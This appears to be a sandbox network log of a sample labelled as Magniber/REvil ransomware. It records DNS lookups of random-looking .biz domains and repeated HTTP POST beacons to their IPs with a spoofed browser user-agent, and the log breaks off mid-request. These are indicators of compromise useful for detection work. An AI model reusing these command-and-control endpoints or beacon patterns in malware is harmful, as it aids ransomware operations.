8.8.8.8:53

Request

jlqltsjvh.biz

IN A

Response

jlqltsjvh.biz

IN A

18.141.10.107
POST

http://jlqltsjvh.biz/qrrcinfuxrxvisa

alg.exe

Remote address:

18.141.10.107:80

Request

POST /qrrcinfuxrxvisa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jlqltsjvh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=668a19567bfdcff6db9cb001eb5e74ca|191.101.209.39|1719160450|1719160450|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jlqltsjvh.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

jlqltsjvh.biz

IN A

Response

jlqltsjvh.biz

IN A

18.141.10.107
POST

http://jlqltsjvh.biz/kqbwaelefsfxo

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /kqbwaelefsfxo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jlqltsjvh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d7bedd1471fc42de427c8ea4e687d4de|191.101.209.39|1719160450|1719160450|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xyrgy.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

xyrgy.biz

IN A

Response

xyrgy.biz

IN A

18.208.156.248
POST

http://xyrgy.biz/sivwehsagapreq

alg.exe

Remote address:

18.208.156.248:80

Request

POST /sivwehsagapreq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c639cb924416ef0df50550f97d9e8a10|191.101.209.39|1719160450|1719160450|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xyrgy.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

xyrgy.biz

IN A

Response

xyrgy.biz

IN A

18.208.156.248
POST

http://xyrgy.biz/lvshqkwcpdxqgfh

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /lvshqkwcpdxqgfh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=77970916c32593fc04ba91de680898d2|191.101.209.39|1719160451|1719160451|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

htwqzczce.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

htwqzczce.biz

IN A

Response

htwqzczce.biz

IN A

172.234.222.143

htwqzczce.biz

IN A

172.234.222.138
POST

http://htwqzczce.biz/tcafthtonxtpl

alg.exe

Remote address:

172.234.222.143:80

Request

POST /tcafthtonxtpl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
DNS

htwqzczce.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

htwqzczce.biz

IN A

Response

htwqzczce.biz

IN A

172.234.222.138

htwqzczce.biz

IN A

172.234.222.143
POST

http://htwqzczce.biz/lxkdjqrhttjsuedp

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

172.234.222.138:80

Request

POST /lxkdjqrhttjsuedp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
POST

http://htwqzczce.biz/koucuapch

alg.exe

Remote address:

172.234.222.143:80

Request

POST /koucuapch HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
POST

http://htwqzczce.biz/cdehjinuncqv

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

172.234.222.138:80

Request

POST /cdehjinuncqv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
DNS

kvbjaur.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

kvbjaur.biz

IN A

Response

kvbjaur.biz

IN A

54.244.188.177
POST

http://kvbjaur.biz/ljexmgkyl

alg.exe

Remote address:

54.244.188.177:80

Request

POST /ljexmgkyl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kvbjaur.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=859ef177ea07e5699f9e9da26b798c59|191.101.209.39|1719160451|1719160451|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

kvbjaur.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

kvbjaur.biz

IN A

Response

kvbjaur.biz

IN A

54.244.188.177
POST

http://kvbjaur.biz/arrehjbcphgebl

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /arrehjbcphgebl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kvbjaur.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=85c40bde2a34108a175187db2fcd918b|191.101.209.39|1719160452|1719160452|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uphca.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

uphca.biz

IN A

Response

uphca.biz

IN A

44.221.84.105
POST

http://uphca.biz/nkruuxr

alg.exe

Remote address:

44.221.84.105:80

Request

POST /nkruuxr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uphca.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5c15bfe62e25c56a07667e2d15daddec|191.101.209.39|1719160452|1719160452|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uphca.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

uphca.biz

IN A

Response

uphca.biz

IN A

44.221.84.105
POST

http://uphca.biz/bhsprngmxifidqm

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /bhsprngmxifidqm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uphca.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=194e225e6953a1bbbe7f1266d61f66af|191.101.209.39|1719160452|1719160452|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fjumtfnz.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

fjumtfnz.biz

IN A

Response

fjumtfnz.biz

IN A

34.211.97.45
POST

http://fjumtfnz.biz/jpnu

alg.exe

Remote address:

34.211.97.45:80

Request

POST /jpnu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fjumtfnz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8ecf134d5d13e05ed660fc83b6fcdf7b|191.101.209.39|1719160452|1719160452|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fjumtfnz.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

fjumtfnz.biz

IN A

Response

fjumtfnz.biz

IN A

34.211.97.45
POST

http://fjumtfnz.biz/etjcfcchdkp

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /etjcfcchdkp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fjumtfnz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=79220d45ccab275574531a7d8bdf7843|191.101.209.39|1719160452|1719160452|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hlzfuyy.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

hlzfuyy.biz

IN A

Response

hlzfuyy.biz

IN A

34.211.97.45
POST

http://hlzfuyy.biz/kmonv

alg.exe

Remote address:

34.211.97.45:80

Request

POST /kmonv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hlzfuyy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f2f30079202f8eb22e9f700f3b2b2c5d|191.101.209.39|1719160453|1719160453|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hlzfuyy.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

hlzfuyy.biz

IN A

Response

hlzfuyy.biz

IN A

34.211.97.45
POST

http://hlzfuyy.biz/huoxnbjw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /huoxnbjw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hlzfuyy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ad70d919ffccc430f355e0279b326fa0|191.101.209.39|1719160453|1719160453|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rffxu.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

rffxu.biz

IN A

Response

rffxu.biz

IN A

34.246.200.160
POST

http://rffxu.biz/ygv

alg.exe

Remote address:

34.246.200.160:80

Request

POST /ygv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rffxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4e5c93f0061d3dcf6b79697522a3d05d|191.101.209.39|1719160453|1719160453|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rffxu.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

rffxu.biz

IN A

Response

rffxu.biz

IN A

34.246.200.160
POST

http://rffxu.biz/tkrnngplax

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.246.200.160:80

Request

POST /tkrnngplax HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rffxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=655db5beba21ebddf249022246d1d509|191.101.209.39|1719160453|1719160453|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cikivjto.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

cikivjto.biz

IN A

Response

cikivjto.biz

IN A

44.213.104.86
POST

http://cikivjto.biz/ybmd

alg.exe

Remote address:

44.213.104.86:80

Request

POST /ybmd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cikivjto.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=538e671dcd04aa1c1742e1a20c9f0bad|191.101.209.39|1719160453|1719160453|0|1|0; path=/; domain=.cikivjto.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cikivjto.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

cikivjto.biz

IN A

Response

cikivjto.biz

IN A

44.213.104.86
POST

http://cikivjto.biz/ufikgfkqepw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.213.104.86:80

Request

POST /ufikgfkqepw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cikivjto.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2fa6dbaa775d3e435e0fa8c13052b1aa|191.101.209.39|1719160453|1719160453|0|1|0; path=/; domain=.cikivjto.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qncdaagct.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

qncdaagct.biz

IN A

Response

qncdaagct.biz

IN A

47.129.31.212
POST

http://qncdaagct.biz/icq

alg.exe

Remote address:

47.129.31.212:80

Request

POST /icq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qncdaagct.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ccc006daa046cb3054ed1cb8f5303a96|191.101.209.39|1719160454|1719160454|0|1|0; path=/; domain=.qncdaagct.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qncdaagct.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

qncdaagct.biz

IN A

Response

qncdaagct.biz

IN A

47.129.31.212
POST

http://qncdaagct.biz/mqpsfy

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

47.129.31.212:80

Request

POST /mqpsfy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qncdaagct.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3df196915dcec16a466bcee1a17d6b2d|191.101.209.39|1719160454|1719160454|0|1|0; path=/; domain=.qncdaagct.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

shpwbsrw.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

shpwbsrw.biz

IN A

Response

shpwbsrw.biz

IN A

13.251.16.150
POST

http://shpwbsrw.biz/tblaic

alg.exe

Remote address:

13.251.16.150:80

Request

POST /tblaic HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: shpwbsrw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e4303c07b8e0322a7e7d5e07e68cf1d6|191.101.209.39|1719160455|1719160455|0|1|0; path=/; domain=.shpwbsrw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

shpwbsrw.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

shpwbsrw.biz

IN A

Response

shpwbsrw.biz

IN A

13.251.16.150
POST

http://shpwbsrw.biz/chsq

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /chsq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: shpwbsrw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d224d3385c6df8919edf23bce5007cd4|191.101.209.39|1719160456|1719160456|0|1|0; path=/; domain=.shpwbsrw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cjvgcl.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

cjvgcl.biz

IN A

Response

cjvgcl.biz

IN A

18.208.156.248
POST

http://cjvgcl.biz/wojgmoovfsovbv

alg.exe

Remote address:

18.208.156.248:80

Request

POST /wojgmoovfsovbv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cjvgcl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=51219ca1d826d57c03503be9c7609c74|191.101.209.39|1719160456|1719160456|0|1|0; path=/; domain=.cjvgcl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cjvgcl.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

cjvgcl.biz

IN A

Response

cjvgcl.biz

IN A

18.208.156.248
POST

http://cjvgcl.biz/qnlbxfummtvy

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /qnlbxfummtvy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
